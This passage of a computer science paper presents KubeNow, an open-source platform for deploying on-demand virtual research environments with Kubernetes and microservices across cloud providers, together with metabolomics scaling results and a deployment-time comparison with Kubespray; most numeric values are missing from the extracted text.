thousands of cores (laure & edlund, ). accessing adequate e-infrastructure therefore represents a major challenge in science. further, the need for computing power can vary a lot during the course of a research project and large resources are generally needed only when large-scale computations are being executed (lampa et al., ; dahlö et al., ). to this extent, moving analyses to cloud resources represents an interesting opportunity from an investment perspective. indeed, cloud resources come as a configurable virtual infrastructure that can be allocated and released as needed with a pay-per-use pricing model (armbrust et al., ). however, this way of procuring resources introduces a layer of complexity that researchers may find hard to cope with; configuring virtual resources requires substantial technical skills (weerasiri et al., ) and it is generally a tedious and repetitive task when it is done on demand. therefore, when running scientific applications how to cite this article capuccini m, larsson a, carone m, novella ja, sadawi n, gao j, toor s, spjuth o. . on-demand virtual re- search environments using microservices. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:marco.capuccini@farmbio.uu.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. on cloud, there is a need for a methodology to aid this process. in addition, to promote sustainability, this methodology should be generally applicable over multiple research domains, hence allowing to compose working environments from established scientific software components. the idea of allocating composable, on-demand working environments on a ‘‘global virtual infrastructure’’ was envisioned by candela, castelli & pagano ( ). these working environments, which comprehensively serve the needs of a community of practice, are commonly referred to as virtual research environments (vres). roth et al. ( ) and assante et al. ( ) identify cloud resources as the underlying ‘‘global virtual infrastructure’’ for these systems and provide two similar implementations that offer on-demand allocation of vres. both implementations enable to dynamically compose vres from a collection of scientific applications, which are nevertheless installed directly on virtual machines (vms). following this approach, due to the remarkably heterogeneous landscape of scientific software packages, one will almost inevitably encounter conflicting dependencies (williams et al., ). the technology that has been recently introduced under the umbrella of microservice-oriented architecture (see ‘microservice-oriented architecture and technology’) has cleared the way for a remedy to this problem, providing an improved mechanism for isolating scientific software (williams et al., ). the idea consists of introducing an engine that leverages on kernel namespaces to isolate applications at runtime. the resulting software environments are lightweight, easy and fast to instantiate, and they are commonly referred to as containers. noticeable efforts in leveraging this technology to deliver improved vres were made by the phenomenal project (in medical metabolomics) (peters et al., ), by the extras project (in astrophysics) (d’agostino et al., ) and by the square kilometer array (ska) project (in radio astronomy) (wu et al., ). however, despite of microservice-oriented applications being consider the gold standard of cloud-native systems, extras and ska run their vres on dedicated servers. here we introduce a general methodology to allocate vres on demand using cloud resources—which we have also implemented in phenomenal. the methodology that we introduce in this paper addresses a number of research questions that arise when designing on-demand vres using microservices. firstly, allocating virtual infrastructure and setting up the required middleware is hard for non-it experts. thus, we face the question of how to provide a seamless allocation procedure for scientists while still enabling a good level of configurability for a specific set up. secondly, scientists should be able to run vres on multiple clouds while operating with the same immutable infrastructure and tooling ecosystem. when using public cloud resources, this is challenging due to the heterogeneity of vendor-specific features and tools. further, it is common in academic settings to leverage commodity clouds that run on premises. while it is important to support these systems as regulations may forbid certain datasets to be handled in public settings, commodity clouds offer a reduced set of features; we face the question of how to enable immutable vres in commercial and commodity settings. lastly, we face the question of how to provide vres that scale reasonably well. to this extent, there are two main aspects that we cover in this paper: ( ) scaling of scientific analyses and ( ) scaling of vre instantiation. in connection to this second point, it is important to consider capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that our methodology is designed around the idea of on-demand, short-lived deployments; high availability is not crucial while instantiation speed is of great importance. based on our methodology, we implemented kubenow: a comprehensive open-source platform for the instantiation of on-demand vres. please notice that we use the term platform as opposed to platform as a service (paas), because kubenow comes with a command-line interface (cli) that operates from the user’s workstation—rather than providing a publicly available application programming interface (api). the platform is currently in production as part of the phenomenal project and we employ such use case to demonstrate the applicability of the proposed methodology. in summary, our key contributions are as follows. • we introduce a general methodology for on-demand vres with microservices (‘on- demand vres with microservices’). the methodology enables: ( ) simplicity in vre instantiation, ( ) vre allocation over commercial and commodity clouds and ( ) scalable execution of scientific pipelines on cloud resources. • we provide an open source implementation, named kubenow, that enables instantiating on-demand vres on the major cloud providers (‘implementation’). • we demonstrate the applicability and the scalability of our methodology by showing use cases and performance metrics from the phenomenal project (‘evaluation’). in connection to our first research question, concerning simplicity, this also contributes in showing how researchers with little it expertise were able to autonomously allocate multi-node vres using kubenow. • we evaluate the scalability of kubenow in terms of deployment speed and compare it with a broadly adopted microservice architecture installer (‘deployment automation scalability’). microservice-oriented architecture and technology the microservice architecture is a design pattern where complex service-oriented applications are composed of a set of smaller, minimal and complete services (referred to as microservices) (thönes, ). microservices are independently deployable and compatible with one another through language-agnostic apis, like building blocks. hence, these blocks can be used in different combinations, according to the use case at hand. this software design promotes interoperability, isolation and separation of concerns, enabling an improved agile process where developers can autonomously develop, test and deliver services. software container engines and container orchestration platforms constitute the cutting- edge enabling technology for microservices. this technology enables the encapsulation of software components such that any compliant runtime can execute them with no additional dependencies on any underlying infrastructure (open container initiative, ). such software components are referred to as software containers, application containers, or simply containers. among the open source projects, docker emerged as the de-facto standard software container engine (shimel, ). along with docker, singularity capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. has also seen considerable adoption by the scientific community as it improves security on high-performance computing systems (kurtzer, sochat & bauer, ). even though container engines like docker and singularity serve similar purposes as hypervisors, they are substantially different in the way they function. when running a vm, an hypervisor holds both a full copy of an operating system (os) and a virtual copy of the required hardware, taking up a considerable amount of system resources (vaughan-nichols, ). in contrast, software container engines leverage on kernel namespaces to provide isolation, thus running containers directly on the host system. this makes containers considerably lighter and faster to instantiate, when compared to vms. nevertheless, containers have a stronger coupling with the os, thus if they get compromised an attacker could get complete access to the host system (manu et al., ). hence, in real-world scenarios a combination of both vms and containers is probably what most organizations should strive towards. in current best practices, application containers are used to package and deliver microservices. these containers are then deployed on cloud-based clusters in a highly- available, resilient and possibly geographically disperse manner (khan, ). this is where container orchestration frameworks are important as they provide cluster-wide scheduling, continuous deployment, high availability, fault tolerance, overlay networking, service discovery, monitoring and security assurance. being based on over a decade of google’s experience on container workloads, kubernetes is the orchestration platform that has collected the largest open source community (asay, ). other notable open source orchestration platforms include marathon ( ), which is built on top of the mesos resource manager (hindman et al., ), and swarm which was introduced by docker (naik, ). on-demand vres with microservices in this section we introduce the methodology that enables on-demand vres. the methodology is built around the microservice-oriented architecture, and its companion technology. here we explain our solution on a high level, thus not in connection to any specific software product or vendor. later in this paper (‘implementation’) we also show an implementation of this methodology that builds on top of widely adopted open source tools and cloud providers. architecture figure shows a general architecture for on-demand vres. the architecture is organized in three layers: cloud provider, orchestrator and microservices. in describing each layer we follow a bottom-up approach. cloud provider at the lowest level, the cloud provider layer manages virtual resources at infrastructure level. in our methodology this layer enables to dynamically procure infrastructure when a vre is instantiated. physical resources can be outsourced (public cloud), in house (private cloud) or anywhere in between (hybrid cloud). capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure microservice-oriented architecture for on-demand vres. the architecture is organized in three layers: cloud provider, orchestrator and microservices. the two lowest layers offer necessary services to the above layer. in particular the cloud provider manages virtual resources at infrastructure level, and the orchestrator manages microservices that run as application containers. the uppermost layer run a set of container-based microsrvices for a certain community of practice. the vre is instantiated through a deployment automation, which may also configure a content delivery network (cdn) and a dynamic domain name system (dyndns) to serve the user interfaces. full-size doi: . /peerjcs. /fig- there are a few necessary services that a cloud system should offer to serve the purpose of a vre. first, a compute service should enable for booting and managing the vms that will provide computing power. second, a network service should provide management for vms interconnection, routing, security rules and other networking-related concerns. third, a block storage service should provide volumes management for vms. finally, an api should provide programmatic access to the all of the other services (to enable automation). apart from these basic requirements, vres need a few other services that may not be offered by commodity providers (such as moderately sized university installations). luckily, their implementation as microservices is relatively easy as we describe in ‘microservices’— and it is crucial in commodity settings. first, it is important to point out that the main purpose of vres is to run computations through scientific tools. these tools can be run dispersively in the virtual cluster, thus needing a shared file space for synchronization and concurrent dataset handling. this cannot be provided via block storage, as usually it does not allow for concurrent access. concurrent access may be achieved via object storage, a well-established storage service that is capable of providing shared file spaces (karakoyunlu et al., ). as the name suggests the service manages files as objects, thus being substantially different from posix storage systems. this may represent a challenge in the context of vres, as scientific tools can usually only operate on a locally-mounted posix space. however, this challenge can be tackled by third party products (such as capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. cloudfuse ( ), that can abstract and mount the object storage as a posix file system. as an alternative to object storage, some cloud providers recently started to offer shared posix storage, which enables concurrent access on posix file spaces. some examples include amazon elastic file system ( ), google cloud filestore, ( ), azure netapp files ( ) and openstack manila ( ). nevertheless, in contrast to object storage, this solution did not yet reach a consensus in terms of implementation and functionalities across different providers. finally, a cloud provider may offer a load balance service. as the name suggests, this service can be used to load balance incoming traffic from a certain public ip to a configurable set of vms or microservices. in the context of vres, this can be useful to expose many services under a single public ip (as related quotas may be limited). orchestrator as we mentioned in the introduction, our methodology makes use of application containers to improve the isolation of scientific software environments. a few cloud providers offer native management for container instances (amazon elastic container service, ; google cloud run, ; azure container instances, ; openstack zun, ), nevertheless these solution are strongly coupled with vendor-specific tooling and they are seldom supported by commodity cloud systems. hence, to promote portability of vres, it is preferable to not rely on container-native cloud environments. however, when leveraging solely on vms there is no straightforward way to manage disperse containers. this is where the orchestrator is important, as it abstracts vm-based clusters so that containers can be seamlessly scheduled on the underlying resources. there are a few orchestration platforms available in the open source ecosystem (as we discussed in ‘microservice-oriented architecture and technology’), and our methodology is not tied to any of these in particular. however, there are a few services that an orchestrator should offer to support on-demand vres. first, a scheduling service should support cluster-wide resource management and scheduling for application containers. this service should also manage container replication across the cluster, and reschedule failed container (possibly to different nodes in case of vm failure). since containers can be scheduled across many vms, an overlay network should provide interconnection among them. in addition, a service discovery mechanism should provide the means to retrieve container addresses in the overlay network. this usually comes as a dns service that should only be available inside the cluster. in order to provide data persistency and synchronization between replicas, a volume management service should offer container volumes operations across the cluster. this means that containers should be able to access a shared volume, possibly concurrently, from any host. since this represents a major challenge, on this layer volume management should only represent an abstraction of an underlying storage system, such as a block storage or a shared posix storage. apart from file spaces, the orchestrator should be able to manage and mount secrets, such as encryption keys and passwords, in the containers through a secret management service. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cloud integrations may be optionally offered by the orchestrator, and be beneficial in the context of vres. this service enables to dynamically provision resources on the underlying layer. for instance, on-demand vres with cloud integrations may dynamically procure load balancers and cloud volumes for the managed containers. finally, the orchestrator should provide an api to allow programmatic access to its services (enabling automation). microservices the set of services for a certain community of practice run as container-based microservices, on top of the orchestration platform. while we envision the previous layers to be exchangeable between communities of practice, this layer may offer substantially different functionalities, according to the application domain. luckily, microservices-oriented systems for different scientific domains (e.g., phenomenal, extras and ska) are very similar in their design, allowing us to give a general overview of this layer. first, we make a distinction between jobs and deployments. jobs are mainly application containers that run scientific tools, to perform some analyses. the idea consists of instantiating each processing tool, execute a part of the analysis, and allowing it to exit as soon as the computation is done. in this way the analysis can be divided into smaller blocks and distributed over the cluster. deployments should include a workflow system, a monitoring platform and user interfaces. workflow systems (or similar analytics services) enable to define and orchestrate distributed pipelines of containerized tools. for the containerized tools scheduling to work, it is crucial that the selected workflow system is compatible with the underlying orchestrator. monitoring systems collect cluster-wide performance metrics, logs and audit trails, possibly aggregating them in visual dashboards. user interfaces provide graphical access to the workflow and monitoring systems, and possibly enable interactive analysis through the execution of live code. an important remark is that as interfaces are typically stateless, their implementation as functions (baldini et al., ) should also be considered when the integration with the workflow systems and the monitoring platform is feasible. finally, on this layer shared posix storage, object storage and load balance may be implemented as container-based microservices, if not provided by the underlying commodity cloud service. many available open source projects provide these services and support the major orchestration platforms, thus making the implementation relatively simple (see ‘implementation’). content delivery network and dynamic domain name system content delivery networks (cdns) are geographically disperse networks of proxy servers (pathan & buyya, ). the main goal of a cdn is to improve the quality of web services by caching contents close to the end user. even though this is not particularly beneficial for short-lived systems, modern cdns offer additional benefits that are relevant for on-demand vres. in fact, when proxying web traffic, cdns can provide seamless https encryption, along with some protection against common attacks (e.g., distributed denial of service). since modern cdns can be configured programmatically via apis, this provides an easy way to setup encryption on-demand. when comparing with let’s encrypt (manousis et al., ), this system has the advantage of seamlessly issuing and storing a single certificate. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this is relevant for on-demand systems, as they may need to be instantiated multiple times in a relatively short period of time, thus making important to reuse existing certificates. in contrast, let’s encrypt only enables to issue new certificates leaving their management up to the users. dynamic domain name system (dyndns) is a method that enables automatic dns records update (vixie et al., ). since on-demand vres are instantiated dynamically, each instance can potentially expose endpoints on different ip addresses. dyndns enables to automatically configure dns servers, so that endpoints will always be served on a configurable domain name. even though we recommend adoption for user friendliness, cdns and dyndns are optional components. secure shell (ssh) tunnelling and virtual private network gateways are valid alternatives to securely access the endpoints. in addition, it is relatively simple to discover dynamically allocated ip addresses by using the cloud api. deployment automation setting up the presented architecture requires substantial knowledge of the technology, and it may represent a challenge even for a skilled user. furthermore, for on-demand vres this time-consuming task needs to be performed for each instantiation. therefore, on-demand vres should include a deployment automation. the automation should operate over multiple layers in the architecture, by setting up the infrastructure through the cloud api and by setting up the microservices through the orchestrator api. in addition, the automation should also configure the cdn and dyndns when required. the deployment automation should be based on broadly adopted contextualization tools. these can be cloud-agnostic, thus supporting many cloud providers, or cloud specific. cloud-agnostic tools are usually open source, while cloud-specific tools may be licensed. the former has the advantage of generalizing operations over many providers, while the latter might offer commercial support. no matter which set of contextualization tools is chosen, the deployment automation should offer a common toolbox that operates across all of the supported cloud providers. to this extent, contextualizing the system automatically across multiple commercial and commodity clouds is going to be challenging. for the orchestrator layer one could in principle rely on managed setup automations. however, this approach has the disadvantage of tailoring the orchestration layer to vendor-specific tooling. the same stands when relying on managed storage and load balance. further, these services are seldom provided by commodity clouds. therefore, our recommendation is to automate the setup of the orchestration layer without relying on managed services—which also has the advantage of making this layer immutable across providers. along the same lines, we recommend to automate the setup of storage and load balancing as microservices. this not only gives the user the possibility of deploying this services when not offered by the commodity cloud of choice, but also enables for not tailoring the analyses to any vendor-specific storage system. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation we provide an open source implementation of our methodology, named kubenow (kubenow github organization, ). kubenow is generally applicable by design, as it does not explicitly define the uppermost layer in fig. . instead, kubenow provides a general mechanism to define the microservices layer, so that communities of practice can build on-demand vres according to their use cases. kubenow is cloud-agnostic, and it supports amazon web services (aws), google cloud platform (gcp) and microsoft azure, which are the biggest public cloud providers in the market (bayramusta & nasir, ), as well as openstack (the dominating in-house solution (elia et al., )). this is of great importance in science as it allows to take advantage of pricing options and research grants from different providers, while operating with the same immutable infrastructure. furthermore, supporting in-house providers enables to process sensitive data, that may not be allowed to leave research centers. kubenow implements object storage, shared posix storage and load balance in the microservices layer. this is a straightforward solution to maximize the portability of on-demand vres. in fact, these services may not be available in certain private cloud installations, and their apis tend to differ substantially across providers (requiring orchestrators and microservices to be aware of the current host cloud). on the other hand, leveraging on cloud-native services may be beneficial in some cases. as an example, using cloud-native storage enables to persist the data on the cloud, even when the on- demand vre is not running. thus, kubenow gives the possibility to skip the provisioning of object storage, shared posix storage and load balance, leaving their handling to the communities of practice in such case. finally, kubenow is built as a thin layer on top of broadly-adopted software products. below follows a summarizing list. • docker (shimel, ): the open source de facto standard container engine. • kubernetes (asay, ): the orchestration platform that has collected the largest open source community. • glusterfs (glusterfs, ): an open-source distributed file system that provides both shared posix file spaces and object storage. • traefik (traefik, ): an open-source http reverse proxy and load balancer. • cloudflare (cloudflare, ): a service that provides cdn and dyndns. • terraform (terraform, ): an open-source iac tool that enables provisioning at infrastructure level. • ansible (ansible, ): an open-source automation tool that enables provisioning of vms and kubernetes. • packer (packer, ): an open-source packaging tool that enables packaging of immutable vm images. configurability figure shows a sample kubenow configuration. in a kubenow cluster there are four main node entities that can be configured: master, service, storage and edge. apart from capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure kubenow sample configuration. there are four main node entities in a kubenow cluster which are managed via kubernetes. apart from the master node, which runs the kubernetes api, the user can chose how many instances of each node entities to deploy. service nodes run the user application containers. storage nodes run glusterfs, and they attach a block storage volume to provide more capacity. edge nodes run traefik to load balance internet traffic to the application containers, and each of them is associated to a public ip. further, cloudflare manages dns records for the edge nodes ip, and optionally proxies internet traffic to provide encryption. full-size doi: . /peerjcs. /fig- the master node, the user can chose how many instances of each node entity to deploy. by default, each node shares the same private network that allows incoming traffic only on ssh, http and https ports. the master node manages various aspects of the other nodes, retaining the cluster status and running the kubernetes api. the current implementation of kubenow does not support multiple master nodes. this is because the purpose of kubenow is to enable on-demand processing on cloud resources. under this assumption, deployments are supposed to be short lived, hence high availability is not crucial. service nodes are general-purpose servers that typically run user containers. storage nodes run glusterfs, and they are attached to a block storage volume to provide additional capacity. finally, edge nodes are service nodes with an associated public ip address, and they act as reverse proxies and load balancers, for the services that are exposed to the internet. in order to resolve domain names for the exposed services, a wildcard record is configured in the cloudflare dynamic dns service (cloudflare, ), such that a configurable base domain name will resolve to the edge nodes. in addition, the traffic can be proxied through the cloudflare servers, using a fully encrypted connection. when operating in this mode cloudflare provides https connections to the end user, and it protects against distributed denial of service, customer data breach and malicious bot abuse. apart from the typical setting that we show in fig. , some other configurations can be used. excluding the master node, each node entity is optional and it can be set to any capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. $ kn init <provider> <dir> $ cd <dir> $ kn apply $ kn helm install <package> (a) manual configuration $ kn init --preset <preset> \ $ <provider> <dir> $ cd <dir> $ kn apply (b) preset system listing : kubenow cli user interaction. the init subcommand sets up a deployment directory for a certain cloud provider. when choosing to configure kubenow manually the user does not specify any preset and moves to the deployment directory, where some configuration files need to be edited (see listing b). alternatively, one can chose to ini- tialize the deployment with a preset made available by the community of practice (see listing b). the apply subcommand then deploys kubenow as specified in the config- uration files. lastly, the helm subcommand is used to install the application-specific re- search environment. when using the preset system this last step is not necessary, as the helm packages that compose the vre are installed automatically as specified in preset. replication factor. for instance, when ip addresses are particularly scarce, it is possible to not deploy any edge node, and to use the master node as reverse proxy instead (this may often be the case for commodity cloud settings). the same stands for the storage nodes, that can be removed when an external filesystem is available. in addition, for single-server setups, it is possible to deploy the master node only, and to enable it for service scheduling. finally, since for entry-level users it can be difficult to reserve a domain name and set it up with cloudflare, it is possible to use nip.io (nip.io, ) instead. nip.io provides for an easy mechanism to resolve domain names without needing any configuration (e.g., foo. . . . .nip.io maps to bar. . . . .nip.io maps to . . . , etc.). command-line interface the kubenow deployment automation is available as a cli, namely kn, that has the goal of making cloud operations transparent. indeed, we envision researchers to autonomously set up cloud resources, without performing complex tasks outside their area of expertise. the kn cli wraps around a docker image that encapsulates terraform, ansible and a few other dependencies, hence docker is the only client-side requirement. listing a shows a typical user interaction. the user starts by initializing a deployment directory for a certain cloud provider with the kn init command. the deployment directory contains some template files that need to be filled in. these files can be used to configure how many of each of the available node entities to deploy (see ‘configurability’), as well as low level parameters such as node flavors, networking and credentials. this way of configuring the deployment hides complex kubernetes operations that would otherwise be needed to specialize the nodes. once the user is done with the configurations, the deployment is started by moving into the deployment directory and by running the kn apply command. this command sets up kubernetes as well as the kubenow infrastrucuture (fig. ). finally, the application-specific research environment is installed on top of kubenow, by running helm ( ) (the kubernetes package manager). even if preparing kubernetes packages capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. requires substantial expertise, ready-to-use applications can be made available through helm repositories. listing b shows an easier way of deploying a vre, which trades off configurability. indeed, configuring the deployment can be hard for inexperienced users. using the preset system, the user can specify a preset provided by the vre’s community of practice which populates the configuration files with a common setup for the cloud provider of choice. in this way the user only needs to fill in the cloud credentials and optionally make some configuration adjustment. following this approach, the configuration files also include the helm packages that need to be installed, thus the kn apply command can bring up the complete setup automatically. enabling scalable deployments enabling fast and scalable deployments is crucial when leveraging cloud infrastructure on-demand. in fact, if the deployment time grows considerably when increasing the number of nodes, the vre instantiation time likely dominates over the analysis time, making less appealing to invest in large-scale resources. in order to achieve fast and scalable deployments, there are two main ideas that we introduced in our automation. first, the instances are booted from a preprovisioned image (collaboratively developed via travis ci, ). when the image is not present in the cloud user space, the deployment automation imports it, making all of the consecutive deployments considerably faster. using this approach, all of the required dependencies are already installed in the instances at boot time, without paying for any time-consuming download. the second idea consists in pushing the virtual machines contextualization through cloud-init ( ), by including a custom script in the instances bootstrap. in this way, the machines configure themselves independently at boot time leading to a better deployment time scaling, when compared to systems where a single workstation coordinates the whole setup process (as we show in ‘evaluation’). this latter approach is even more inefficient when the deployment automation runs outside of the cloud network, which is a quite common scenario. evaluation we evaluate our methodology using kubenow as implementation. being based on kubernetes, our system benefits from the resilience characteristics provided by the orchestration platform. resilience in kubernetes was previously discussed and studied (vayghan et al., ; netto et al., ; javed et al., ) and it is trusted by several organizations (neal, ); thus, we do not show a resiliency evaluation here. instead, we show how the adoption of our methodology enable scientific analysis at scale (‘full analysis scaling’). in particular, we show that running posix and object storage as microservices, through kubenow, offer a scalable synchronization space for parallel scientific pipelines while enabling vres on commodity clouds—thus validating the design that we show in fig. . further, we show how kubenow scales in terms of deployment speed on each cloud provider, also in comparison with a broadly adopted kubernetes installer (‘deployment automation scalability’). regarding this last point, it is not our intention to compare the capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cloud providers in terms of speed or functionalities, but to show that the deployment scales well on each of them. execution of scientific analysis kubenow has been adopted by the phenomenal project to enable the instantiation of on- demand vres (peters et al., ). the phenomenal project aims at facilitating large-scale computing for metabolomics, a research field focusing on studying the chemical processes involving metabolites, which constitute the end products of processes that take place in biological cells. setting up the required middleware manually, when running phenomenal on demand, was originally a complex and repetitive task which made the whole process often infeasible. the adoption of kubenow has helped the phenomenal community to automate on-demand deployments that now boil down to running a few commands in the resercher’s workstation. on top of kubenow, the phenomenal vres run a variety of containerized processing tools as well as three workflow systems, a monitoring platform and various user interfaces. more in detail, the vres provide luigi (luigi, ), galaxy (goecks et al., ) and pachyderm (pachyderm, ) as workflow systems and the elasticsearch fluentd kibana stack (cyvoct, ) as monitoring platform, all of which come with their built-in user interfaces. in addition, phenomenal vres also provide jupyter (jupyter, ) to enable interactive analysis through a web-based interface. phenomenal vres have seen applications in mass spectrometry, nuclear magnetic resonance analyses as well as in fluxomics (emami khoonsari et al., ). even though these three use cases come from metabolomics studies, they are substantially different and require different tools and pipelining techniques. this suggests that our methodology is generally applicable and supports applications in other research fields. parallelization of individual tools gao et al. ( ) and novella et al. ( ) used the phenomenal vres to parallelize three individual metabolomics tools: batman (hao et al., ), featurefindermetabo (featurefindermetabo, ) and csi:fingerid (duhrkop et al., ). in these two studies different choices were made in terms of infrastructure setup, utilized workflow system and cloud provider. however, in both cases the parallelization was performed by splitting the data into n partitions, where n was also the number of utilized vcpus, and by assigning each partition to a containerized tool replica. gao et al. ran their analysis on dimensional spectra of blood serum from the mesa consortium (bild et al., ; karaman et al., ), while novella et al. processed a large-scale dataset containing mass spectrometry runs from cerebrospinal fluid samples (herman et al., ). in both studies the performance is evaluated in terms of measured speedup when increasing the number of utilized vcpus. the speedup was computed as tn /t where tn is the running time of the parallel implementation on n cores and t is the running time of the containerized tool on single core (measured on the same cloud provider). gao et al. used the luigi workflow system to parallelize batman on azure and on the embl-ebi openstack embl-ebi cloud ( ) installation. when running on azure they used capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. vcpus sp ee du p batman (embl-ebi openstack) featurefindermetabo (aws) batman (azure) csi:fingerid (aws) linear (ideal) figure speedup plot for three containerized tools. the plot shows speedups for three containerized tools that were parallelized using the phenomenal on-demand vre on different cloud providers. please notice the logarithmic scale (in base ) on both axes. full-size doi: . /peerjcs. /fig- service nodes with vcpus and gb of ram each, and storage node with vcpus and gb of ram. on the embl-ebi openstack they used worker nodes with vcpus and gb of ram each, and storage nodes with vcpus and gb of ram each. under these settings they run on , , , and vcpus on azure, and on , , , and vcpus on the embl-ebi openstack. novella et al. used the pachyderm workflow system to parallelize featurefindermetabo and csi:fingerid on aws. they run their experiments on aws, using the t . xlarge instance flavor (eight vcpus and gb of ram) for each node in their clusters. they used five service nodes and three storage nodes when running on vcpus, eight service nodes and four storage nodes when running on vcpus, service nodes and six storage nodes when running on vcpus, and service nodes and seven storage nodes when running on vcpus. figure shows the measured speedup for each tool in the referenced studies. even though these tools differ in terms of cpu and i/o demands, their speedup has a close to linear growth up to vcpus. for the batman use case, the speedup starts to level out at vcpus when running on azure and at vcpus when running on the embl-ebi openstack. however, we point out that gao et al. used only one storage node when running on azure, meaning that in such case more i/o contention occurred. full analysis scaling emami khoonsari et al. ( ) used the phenomenal vre to scale the preprocessing pipeline of mtbls , one of the largest metabolomics studies available on the metabolights repository (haug et al., ). the dataset consists of mass spectrometry samples from whole cell lysates of human renal proximal tubule cells. this use case is substantially different from the previous benchmarks, as the analysis was composed by several tools chained into a single pipeline, and because the scalability was evaluated over capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . . vcpus w se figure wse plot for the mtbls pipeline. the plot shows the weak scaling efficiency (wse) for the mtbls pipeline, executed using the phenomenal on-demand vre on an openstack-based provider. full-size doi: . /peerjcs. /fig- the full workflow. however, the parallelization was again implemented by assigning a roughly equal split of the data to each container replica. the scalability of the pipeline was evaluated by computing the weak scaling efficiency (wse) when increasing the number of utilized vcpus. the pipeline was implemented using the luigi workflow system on the snic science cloud (ssc) (toor et al., ), an openstack-based provider, using the same instance flavor with vcpus and gb of ram for each node in the cluster. to compute the wse, the analysis was repeatedly run on / of the dataset ( vcpus), / of the dataset ( vcpus), / of the dataset ( vcpus) and on the full dataset ( vcpus). then, for n = , , , the wse was computed as t /tn where t was the measured running time on vcpus and tn was the measured running time on n vcpus. figure shows the wse measures. there was a slight loss in terms of wse when increasing the vcpus, however at full regimen the khoonsari et al. measured a wse of . indicating good scalability. the loss in wse is due to growing network contention when increasing the dataset size. this problem can be mitigated by implementing locality-aware scheduling for containers (zhao, mohamed & ludwig, ), and we leave this as future work. deployment automation scalability in order to evaluate how kubenow deployment automation scales over different cluster sizes, we measured and analyzed its deployment time for each of the supported cloud providers: aws (frankfurt region), azure (netherlands region), gcp (belgium region) and openstack (provided by embl-ebi cloud ( ) and located in the united kingdom). then, where applicable, we repeated the measurements using kubespray ( ), a broadly- adopted kubernetes cloud installer, to make a comparison. the experiments were carried out from a local laptop, thus envisioning the common scenario where a researcher needs to set up a one-off cluster, in a remote cloud project. more specifically, the laptop was capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. an apple macbook pro (model a emc ) running on the uppsala university network (sweden). we measured time for multiple instantiations on the supported cloud providers, doubling the size for each cluster instance. apart from the size, each cluster had the same topology: one master node (configured to act as edge), and a -to- ratio between service nodes and storage nodes. this service-to-storage ratio was shown to provide good performance, in terms of distributed data processing, in our previous study (emami khoonsari et al., ). hence, we started with a cluster setup that included one master node, five service nodes and three storage nodes (eight nodes in total, excluding master) and, by doubling size on each run, we scaled up to master node, service nodes and storage nodes ( nodes in total, excluding master). for each of these setups we repeated the measurement five times, to consider deployment time fluctuations for identical clusters. finally, the flavors used for the nodes were: t .medium on aws, standard_ds _v on microsoft azure, n -standard- on gcp, and s .modest on embl-ebi openstack. comparison between kubenow and kubespray to make the comparison as fair as possible, we used the kubespray deployment automation that is based on ansible and terraform (the same tools that are used in kubenow), which uses a bastion node to enable the provisioning with a single ip address. it is worth repeating that public address scarcity is a common issue when dealing with commodity cloud installations, hence we tried to minimize their usage in our experiments. for large deployments, the kubespray documentation recommends to increase the default maximum parallelism in ansible and terraform. since in our experiments we planned to provision up to nodes, we set the maximum parallelism to this value for both kubenow and kubespray. to the best of our knowledge, kubespray makes storage nodes available only for openstack deployments, hence the comparison was possible only on the embl-ebi openstack provider. figure shows the results for kubenow and kubespray in comparison. deployment time fluctuations for repeated runs, with the same cluster size, were not significant. however, there is a significant difference in terms of scalability between the two systems. in fact, we observe that kubespray deployments scale poorly, as they increase in time by a large factor when the cluster size doubles. on the other hand, when doubling the number of nodes, kubenow time increases by a considerably smaller factor, thus providing better scalability. the gap between the two systems becomes of bigger impact as the deployments increase in size. in fact, for the biggest deployment ( nodes) kubenow is ∼ times faster than kubespray. to understand why such a big difference occurs, it is important to highlight how the deployment automation differs in the two systems. kubespray initiates deployments from vanilla images, and it orchestrates the installation from a single ansible script that runs in the user workstation (outside of the cloud network). provisioning vanilla images is not only more time consuming, but it also causes more and more machines to pull packages from the same network as the deployments increase in size, impacting scalability. in the same way, the central ansible provisioner that orchestrates kubespray’s deployments becomes slower and slower in pushing configurations as the number of nodes increases. as we mentioned capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. d e p lo ym e n t ti m e ( s) number of nodes kubenow (embl-ebi openstack) kubespray (embl-ebi openstack) figure kubenow and kubespray deployment time comparison. the plot shows the deployment time, for different cluster sizes (number of nodes), when using kubenow and when using kubespray. the ex- periments were performed on the embl-ebi openstack. error bars for kubenow can be seen on fig. . full-size doi: . /peerjcs. /fig- figure kubenow deployment time by cloud provider. the plot shows the deployment time for differ- ent cluster sizes 